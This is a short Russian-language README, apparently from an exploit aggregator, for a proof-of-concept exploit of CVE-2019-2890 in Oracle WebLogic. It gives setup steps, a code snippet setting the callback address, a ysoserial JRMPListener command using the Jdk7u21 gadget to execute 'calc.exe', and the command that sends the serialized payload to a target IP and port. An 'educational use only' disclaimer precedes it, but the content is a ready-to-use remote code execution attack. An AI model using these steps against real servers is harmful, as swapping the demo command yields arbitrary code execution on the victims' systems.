## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IANXTIANXT-CVE-2019-2890
## Заявление
Используется только для учебных целей. За последствия другого использования ответственность несет пользователь.
## Описание
Соответствующие jar-файлы уже импортированы в проект, метод эксплуатации использует JRMP от yso. При обучении и отладке можно изменить метод эксплуатации.
Сначала необходимо поместить файл **SerializedSystemIni.dat** из weblogic в папку **security**.
Затем необходимо переименовать yso в **ysoserial.jar** и импортировать его в каталог **lib**.

Затем IP-адрес и порт в методе **getObject** в файле **weblogic/wsee/jaxws/persistence/PersistentContext.java**.
root@kitploit:~
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Наконец, удаленно прослушиваем через JRMP и используем команду 7u21 для выполнения.
root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Инструкция по использованию: запустите Poc.java для создания сериализованного файла poc.ser, затем через
root@kitploit:~
python weblogic.py ip port poc.ser